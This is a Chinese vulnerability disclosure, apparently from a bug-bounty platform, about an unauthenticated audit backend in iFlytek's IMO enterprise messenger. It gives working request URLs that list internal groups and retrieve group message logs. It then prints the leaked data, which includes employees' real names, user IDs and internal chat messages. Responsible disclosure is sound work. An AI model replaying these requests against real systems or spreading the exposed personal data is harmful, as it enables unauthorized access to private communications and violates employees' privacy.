2015-12-31: 细节已通知厂商并且等待厂商处理中 2016-01-02: 厂商已经确认,细节仅向厂商公开 2016-01-12: 细节向核心白帽子及相关领域专家公开 2016-01-22: 细节向普通白帽子公开 2016-02-01: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
科大讯飞使用的IMO企业即时通讯软件审计后台未授权访问可导致内部通信记录泄漏。获取群组列表及群id:http://imo.iflytek.com//Customize/Audit/auditreport/Qgrouplist.php返回结果如下:
解码后部分内容:
[{"text":"科大讯飞企信办[已解散]<\/font>","id":1041125,"iconCls":"icon-group"},{"text":"企信办信息系统管理部[已解散]<\/font>","id":1041127,"iconCls":"icon-group"},{"text":"外包组[已解散]<\/font>","id":1041132,"iconCls":"icon-group"},{"text":"人力资源部[已解散]<\/font>","id":1041189,"iconCls":"icon-group"},{"text":"招聘组[已解散]<\/font>","id":1041195,"iconCls":"icon-group"},{"text":"基础维护部[已解散]<\/font>","id":1041242,"iconCls":"icon-group"},{"text":"测试群[已解散]<\/font>","id":1041302,"iconCls":"icon-group"},{"text":"测试1128[已解散]<\/font>","id":1041304,"iconCls":"icon-group"},{"text":"dddddddddddddd[已解散]<\/font>","id":1041306,"iconCls":"icon-group"},{"text":"小卒[已解散]<\/font>","id":1041311,"iconCls":"icon-group"},{"text":"sss[已解散]<\/font>","id":1041332,"iconCls":"icon-group"},{"text":"测试群1202[已解散]<\/font>","id":1041341,"iconCls":"icon-group"},{"text":"企信办信息系统管理部","id":1041346,"iconCls":"icon-group"},{"text":"test222[已解散]<\/font>","id":1041348,"iconCls":"icon-group"},{"text":"人力资源部","id":1041351,"iconCls":"icon-group"},{"text":"企信办","id":1041355,"iconCls":"icon-group"},{"text":"基础维护部","id":1041356,"iconCls":"icon-group"},{"text":"加班不停歇","id":1041358,"iconCls":"icon-group"},{"text":"组织及个人发展组","id":1041359,"iconCls":"icon-group"},{"text":"员工关系组","id":1041360,"iconCls":"icon-group"},{"text":"招聘组","id":1041362,"iconCls":"icon-group"},{"text":"测试群组[已解散]<\/font>","id":1041367,"iconCls":"icon-group"},{"text":"001项目讨论[已解散]<\/font>","id":1041377,"iconCls":"icon-group"},{"text":"002项目讨论[已解散]<\/font>","id":1041378,"iconCls":"icon-group"},{"text":"测试[已解散]<\/font>","id":1041380,"iconCls":"icon-group"},{"text":"测试1213[已解散]<\/font>","id":1041381,"iconCls":"icon-group"},{"text":"篮球[已解散]<\/font>","id":1041398,"iconCls":"icon-group"},{"text":"关系组","id":1041406,"iconCls":"icon-group"},{"text":"20140109[已解散]<\/font>","id":1041408,"iconCls":"icon-group"},{"text":"测试0110[已解散]<\/font>","id":1041411,"iconCls":"icon-group"},{"text":"aaaa[已解散]<\/font>","id":1041416,"iconCls":"icon-group"},{"text":"信息安全小组[已解散]<\/font>","id":1041418,"iconCls":"icon-group"},{"text":"群转让[已解散]<\/font>","id":1041429,"iconCls":"icon-group"},{"text":"企信办管理团队","id":1041433,"iconCls":"icon-group"},{"text":"IT架构管理部","id":1041434,"iconCls":"icon-group"},{"text":"机电学院质量管理委员会","id":1041435,"iconCls":"icon-group"},{"text":"测试管理委员会","id":1041436,"iconCls":"icon-group"},{"text":"技术质量部管理团队","id":1041437,"iconCls":"icon-group"},{"text":"综合管理部合家欢[已解散]<\/font>","id":1041451,"iconCls":"icon-group"},{"text":"互联网技术部-例会[已解散]<\/font>","id":1041453,"iconCls":"icon-group"},{"text":"互联网技术部[已解散]<\/font>","id":1041454,"iconCls":"icon-group"},{"text":"研究院自然语言组[已解散]<\/font>","id":1041456,"iconCls":"icon-group"},{"text":"测试[已解散]<\/font>","id":1041457,"iconCls":"icon-group"},{"text":"1106办公室","id":1041464,"iconCls":"icon-group"},{"text":"音乐搜索","id":1041467,"iconCls":"icon-group"},{"text":"音乐搜索5.0","id":1041470,"iconCls":"icon-group"},{"text":"音乐搜索组长","id":1041471,"iconCls":"icon-group"},{"text":"爱吼网·资源组","id":1041472,"iconCls":"icon-group"},{"text":"Android班","id":1041473,"iconCls":"icon-group"},{"text":"12530产品群","id":1041474,"iconCls":"icon-group"},{"text":"12530项目组","id":1041476,"iconCls":"icon-group"},{"text":"酷音铃声+","id":1041479,"iconCls":"icon-group"},{"text":"加班MM","id":1041481,"iconCls":"icon-group"},{"text":"渠道羽毛球协会","id":1041482,"iconCls":"icon-group"},{"text":"PC输入法","id":1041483,"iconCls":"icon-group"},{"text":"TestClub","id":1041484,"iconCls":"icon-group"},{"text":"科大讯飞足球协会","id":1041485,"iconCls":"icon-group"},{"text":"音乐搜索小组","id":1041487,"iconCls":"icon-group"},{"text":"爱吼研发组","id":1041488,"iconCls":"icon-group"},{"text":"爱吼斗歌(轻应用)内部团队","id":1041495,"iconCls":"icon-group"},{"text":"测试部管理组","id":1041496,"iconCls":"icon-group"},{"text":"音乐搜索2","id":1041497,"iconCls":"icon-group"},{"text":"炫友沟通群","id":1041500,"iconCls":"icon-group"},{"text":"渠道-java组
嗯,这只是一部分。查询某一群在某一时间段的通信记录:比如:http://imo.iflytek.com/Customize/Audit/MessageMonitor/groupSearch.php?id=1041351&startTime=2015-10-01 00:00:00&endTime=2015-12-15 23:55:58&keyWord=看下图:
解码后:
{"total":"16","rows":[{"Ftime":"2015-05-12 17:10:22","Fname":"崔永东","Fcid":"1000","Fuid":"1587","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"安全技术组"}}]},{"Ftime":"2015-05-12 17:09:46","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"有点晕啊"}}]},{"Ftime":"2015-05-12 17:09:43","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"还有信息安全小组吗?"}}]},{"Ftime":"2015-05-12 17:09:12","Fname":"崔永东","Fcid":"1000","Fuid":"1587","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"发的"}}]},{"Ftime":"2015-05-12 17:09:03","Fname":"崔永东","Fcid":"1000","Fuid":"1587","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"陆雯"}}]},{"Ftime":"2015-05-12 17:07:55","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"这个是?"}}]},{"Ftime":"2015-05-12 17:07:41","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"img":{"h":"181","id":"E7F46D02-2F17-457C-85C4-A0A01C3F4FEA","s":"12763","src":".jpg","t":"md5","v":"32504048bdd0ce6284a7ac5af7dae8f8","w":"510"}}]},{"Ftime":"2015-05-11 10:48:56","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"我来跟沈老师说下"}}]},{"Ftime":"2015-05-11 10:48:32","Fname":"胡永平","Fcid":"1000","Fuid":"5496","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"嗯"}}]},{"Ftime":"2015-05-11 10:48:24","Fname":"陈慧","Fcid":"1000","Fuid":"5561","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"公司发的屏保吗?"}}]},{"Ftime":"2015-05-11 10:47:56","Fname":"胡永平","Fcid":"1000","Fuid":"5496","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"360报的,是否误报了?"}}]},{"Ftime":"2015-05-11 10:47:38","Fname":"胡永平","Fcid":"1000","Fuid":"5496","Fqgroup_id":"1041418","Fmsg":[{"img":{"h":"461","id":"C2CE802E-9E7E-4274-8658-708A751CA769","s":"39436","src":".jpg","t":"md5","v":"c3f488567bf4c6900f58c1820247a449","w":"604"}}]},{"Ftime":"2015-02-12 10:35:34","Fname":"吴如伟","Fcid":"1000","Fuid":"5498","Fqgroup_id":"1041418","Fmsg":[{"img":{"h":"622","id":"CE1F6A15-F58B-4580-A2BA-D880201789E1","s":"72122","src":".jpg","t":"md5","v":"20f00768cab8b263f4f04790b18b81e8","w":"919"}}]},{"Ftime":"2015-02-12 10:33:21","Fname":"刘德亮","Fcid":"1000","Fuid":"2716","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"钓鱼"}}]},{"Ftime":"2015-02-12 10:30:25","Fname":"吴如伟","Fcid":"1000","Fuid":"5498","Fqgroup_id":"1041418","Fmsg":[{"txt":{"v":"又是钓鱼邮件"}}]},{"Ftime":"2015-02-12 10:30:11","Fname":"吴如伟","Fcid":"1000","Fuid":"5498","Fqgroup_id":"1041418","Fmsg":[{"img":{"h":"474","id":"1102FC27-A1B0-49AE-9D69-DFF43885D092","s":"47178","src":".jpg","t":"md5","v":"253e9b8d7fd0da8d46e13195c050ea2a","w":"659"}}]}]}
难道安全组已被裁撤了。。。一年了说了这么几句话
参考详细说明。
审计后台放在内网吧。联系厂商把。
危害等级:高
漏洞Rank:15
确认时间:2016-01-02 09:33
感谢提交,正在修复。
暂无
